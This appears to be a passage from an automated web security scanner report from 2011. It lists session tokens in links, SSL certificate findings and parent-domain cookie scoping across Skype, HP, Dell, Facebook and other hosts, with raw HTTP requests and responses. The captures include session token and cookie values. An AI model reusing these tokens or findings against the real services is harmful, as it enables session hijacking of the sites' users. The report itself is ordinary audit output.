GET /extern/login_status.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&app_id=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2a6aed888%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1152b646c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df109277398%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1152b646c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df241c3c5bc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1941a025c%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1152b646c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df241c3c5bc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df83c3762%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1152b646c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df241c3c5bc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2edb73188%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1152b646c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df241c3c5bc&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.39.24
X-Cnection: close
Date: Sun, 04 Sep 2011 16:17:38 GMT
Content-Length: 239

<script type="text/javascript">
parent.postMessage("cb=f83c3762&origin=http\u00253A\u00252F\u00252Fonline.wsj.com\u00252Ff1152b646c&relation=parent&transport=postmessage&frame=f241c3c5bc", "http:\/\/o
...[SNIP]...

8.24. http://www.skype.com/intl/en-us/prices/premium  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/en-us/prices/premium

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /intl/en-us/prices/premium HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:15 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 54583


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Premium - Buy enhanced access to Skype features - Skype</title>
   <meta name="descr
...[SNIP]...
<p><a class="button purchaseCta" href="https://secure.skype.com/account/buy/video?product-type=sp-global-package-10-promo4&campaign-token=8E3DV3BY"><span>
...[SNIP]...
<th><a class="button purchaseCta" id="subs-12-buy" href="https://secure.skype.com/account/buy/video?product-type=sp-global-package-10-promo4&campaign-token=8E3DV3BY"><span>
...[SNIP]...
<th><a class="button purchaseCta" id="subs-3-buy" href="https://secure.skype.com/account/buy/video?product-type=sp-global-package-10-promo4&campaign-token=8E3DV3BY"><span>
...[SNIP]...
<th><a class="button purchaseCta" href="https://secure.skype.com/account/buy/video?product-type=sp-global-package-10-promo4&campaign-token=8E3DV3BY"><span>
...[SNIP]...

8.25. http://www.skype.com/intl/en-us/prices/premium/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/en-us/prices/premium/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /intl/en-us/prices/premium/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:17 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 54583


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Premium - Buy enhanced access to Skype features - Skype</title>
   <meta name="descr
...[SNIP]...
<p><a class="button purchaseCta" href="https://secure.skype.com/account/buy/video?product-type=sp-global-package-10-promo4&campaign-token=8E3DV3BY"><span>
...[SNIP]...
<th><a class="button purchaseCta" id="subs-12-buy" href="https://secure.skype.com/account/buy/video?product-type=sp-global-package-10-promo4&campaign-token=8E3DV3BY"><span>
...[SNIP]...
<th><a class="button purchaseCta" id="subs-3-buy" href="https://secure.skype.com/account/buy/video?product-type=sp-global-package-10-promo4&campaign-token=8E3DV3BY"><span>
...[SNIP]...
<th><a class="button purchaseCta" href="https://secure.skype.com/account/buy/video?product-type=sp-global-package-10-promo4&campaign-token=8E3DV3BY"><span>
...[SNIP]...

9. SSL certificate  previous  next
There are 19 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



9.1. https://apps.skypeassets.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://apps.skypeassets.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  www.skypeassets.com
Issued by:  USERTrust Legacy Secure Server CA
Valid from:  Thu Feb 17 18:00:00 GMT-06:00 2011
Valid to:  Sat Feb 18 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  USERTrust Legacy Secure Server CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Thu Nov 26 14:33:13 GMT-06:00 2009
Valid to:  Sat Oct 31 22:00:00 GMT-06:00 2015

Certificate chain #2

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

9.2. https://blogs.skype.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://blogs.skype.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  *.skype.com
Issued by:  GlobalSign Organization Validation CA
Valid from:  Wed Mar 16 05:46:09 GMT-06:00 2011
Valid to:  Fri Mar 16 05:46:04 GMT-06:00 2012

9.3. https://chat1.us.dell.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://chat1.us.dell.com
Path:   /

Issue detail

The following problems were identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  dellchat.us.dell.com
Issued by:  Dell Inc. Enterprise Issuing CA1
Valid from:  Thu Oct 21 16:13:37 GMT-06:00 2010
Valid to:  Sat Oct 20 16:13:37 GMT-06:00 2012

Certificate chain #1

Issued to:  Dell Inc. Enterprise Issuing CA1
Issued by:  Dell Inc. Enterprise CA
Valid from:  Fri Aug 27 10:44:19 GMT-06:00 2010
Valid to:  Thu Aug 27 10:54:19 GMT-06:00 2015

Certificate chain #2

Issued to:  Dell Inc. Enterprise CA
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Nov 17 09:25:00 GMT-06:00 2004
Valid to:  Mon Aug 13 17:59:00 GMT-06:00 2018

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:  Mon Aug 13 17:59:00 GMT-06:00 2018

9.4. https://h10078.www1.hp.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://h10078.www1.hp.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  whp-cma.extweb.hp.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Mon Jun 20 18:00:00 GMT-06:00 2011
Valid to:  Wed Jun 20 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

9.5. https://h30046.www3.hp.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://h30046.www3.hp.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  g4w2340g.houston.hp.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Sun Mar 13 18:00:00 GMT-06:00 2011
Valid to:  Tue Mar 13 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Wed Jul 16 17:59:59 GMT-06:00 2036

9.6. https://h41183.www4.hp.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://h41183.www4.hp.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  h41183.www4.hp.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Mon May 02 18:00:00 GMT-06:00 2011
Valid to:  Wed May 02 17:59:59 GMT-06:00 2012

9.7. https://mpsnare.iesnare.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://mpsnare.iesnare.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  *.iesnare.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Wed Nov 03 18:00:00 GMT-06:00 2010
Valid to:  Tue Jan 10 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:  Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sat Sep 30 23:00:00 GMT-06:00 2006
Valid to:  Sat Jul 26 12:15:15 GMT-06:00 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

9.8. https://skypecasts.skype.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://skypecasts.skype.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  secure.myspace.skype.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Tue Oct 19 18:00:00 GMT-06:00 2010
Valid to:  Thu Oct 20 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

9.9. https://www.trustwave.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.trustwave.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  1.3.6.1.4.1.311.60.2.1.3=#13025553,1.3.6.1.4.1.311.60.2.1.2=#130844656c6177617265,2.5.4.15=#131256312e302c20436c6175736520352e286429,2.5.4.5=#130733393339373337,O=Trustwave Holdings\, Inc.,L=Chicago,C=US,ST=Illinois,CN=www.trustwave.com
Issued by:  SecureTrust CA
Valid from:  Thu Feb 24 10:39:18 GMT-06:00 2011
Valid to:  Sat Feb 23 12:06:00 GMT-06:00 2013

Certificate chain #1

Issued to:  SecureTrust CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sat Sep 30 23:00:00 GMT-06:00 2006
Valid to:  Tue Nov 26 12:25:48 GMT-06:00 2013

Certificate chain #2

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

9.10. https://adwords.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  adwords.google.com
Issued by:  Google Internet Authority
Valid from:  Thu Aug 11 21:49:49 GMT-06:00 2011
Valid to:  Sat Aug 11 21:59:49 GMT-06:00 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:  Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

9.11. https://connect.facebook.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://connect.facebook.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  connect.facebook.net,ST=CALIFORNIA
Issued by:  Akamai Subordinate CA 3
Valid from:  Tue Feb 15 08:29:01 GMT-06:00 2011
Valid to:  Wed Feb 15 08:29:01 GMT-06:00 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 09:32:00 GMT-06:00 2006
Valid to:  Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:  Mon Aug 13 17:59:00 GMT-06:00 2018

9.12. https://developer.skype.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  developer.skype.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Wed Jun 15 18:00:00 GMT-06:00 2011
Valid to:  Tue Jun 12 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

9.13. https://fls.doubleclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fls.doubleclick.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.doubleclick.net
Issued by:  Google Internet Authority
Valid from:  Thu Aug 11 21:48:42 GMT-06:00 2011
Valid to:  Sat Aug 11 21:58:42 GMT-06:00 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:  Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

9.14. https://login.barracuda.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.barracuda.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  login.barracuda.com
Issued by:  GeoTrust DV SSL CA
Valid from:  Sun Mar 27 06:46:41 GMT-06:00 2011
Valid to:  Mon Apr 28 03:55:58 GMT-06:00 2014

Certificate chain #1

Issued to:  GeoTrust DV SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 26 15:32:31 GMT-06:00 2010
Valid to:  Tue Feb 25 15:32:31 GMT-06:00 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 22:00:00 GMT-06:00 2002
Valid to:  Fri May 20 22:00:00 GMT-06:00 2022

9.15. https://login.skype.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.skype.com
Issued by:  GlobalSign Organization Validation CA
Valid from:  Wed Mar 16 05:46:09 GMT-06:00 2011
Valid to:  Fri Mar 16 05:46:04 GMT-06:00 2012

Certificate chain #1

Issued to:  GlobalSign Organization Validation CA
Issued by:  GlobalSign Root CA
Valid from:  Wed Apr 11 06:00:00 GMT-06:00 2007
Valid to:  Tue Apr 11 06:00:00 GMT-06:00 2017

Certificate chain #2

Issued to:  GlobalSign Root CA
Issued by:  GlobalSign Root CA
Valid from:  Tue Sep 01 06:00:00 GMT-06:00 1998
Valid to:  Fri Jan 28 06:00:00 GMT-06:00 2028

9.16. https://mid.live.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mid.live.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  mid.live.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Mon Jun 21 18:00:00 GMT-06:00 2010
Valid to:  Fri Jul 19 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 18:00:00 GMT-06:00 1997
Valid to:  Mon Oct 24 17:59:59 GMT-06:00 2011

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

9.17. https://secure.skype.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.skype.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.skype.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Sun Mar 13 18:00:00 GMT-06:00 2011
Valid to:  Tue Mar 13 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

9.18. https://secure.skypeassets.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.skypeassets.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.skypeassets.com,ST=Luxembourg
Issued by:  Akamai Subordinate CA 3
Valid from:  Fri Jul 29 15:31:44 GMT-06:00 2011
Valid to:  Sun Jul 29 15:31:44 GMT-06:00 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 09:32:00 GMT-06:00 2006
Valid to:  Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:  Mon Aug 13 17:59:00 GMT-06:00 2018

9.19. https://support.skype.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.skype.com
Issued by:  GlobalSign Organization Validation CA
Valid from:  Wed Mar 16 05:46:09 GMT-06:00 2011
Valid to:  Fri Mar 16 05:46:04 GMT-06:00 2012

Certificate chain #1

Issued to:  GlobalSign Organization Validation CA
Issued by:  GlobalSign Root CA
Valid from:  Wed Apr 11 06:00:00 GMT-06:00 2007
Valid to:  Tue Apr 11 06:00:00 GMT-06:00 2017

Certificate chain #2

Issued to:  GlobalSign Root CA
Issued by:  GlobalSign Root CA
Valid from:  Tue Sep 01 06:00:00 GMT-06:00 1998
Valid to:  Fri Jan 28 06:00:00 GMT-06:00 2028

10. Cookie scoped to parent domain  previous  next
There are 88 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


10.1. https://login.skype.com/account/password-reset-request  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://login.skype.com
Path:   /account/password-reset-request

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/password-reset-request?setlang=en&intsrc=client%7Cforgot-pword HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3; SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 18:00:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: skype-session-token=94fd441852b9e1046c98536f973599d688791fc3; path=/; domain=.skype.com
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 18:00:26 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 42065
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...

10.2. https://login.skype.com/password-reset-request  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://login.skype.com
Path:   /password-reset-request

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /password-reset-request?setlang=en&intsrc=client%7Cforgot-pword HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0
Host: login.skype.com

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 20:59:15 GMT
Server: Apache
Set-Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; path=/; domain=.skype.com; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; path=/; domain=.skype.com
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 20:59:15 GMT; path=/; domain=.skype.com
Location: https://login.skype.com/account/password-reset-request?setlang=en&intsrc=client%7Cforgot-pword
Vary: User-Agent,Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html


10.3. https://mpsnare.iesnare.com/snare.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://mpsnare.iesnare.com
Path:   /snare.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /snare.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Cookie: token=XnRHGFdzDJ8Inb%2Fhay3wwALOAzXiYWksbDCgNf6jldU%3D
Host: mpsnare.iesnare.com
Connection: Keep-Alive
Cache-Control: no-cache
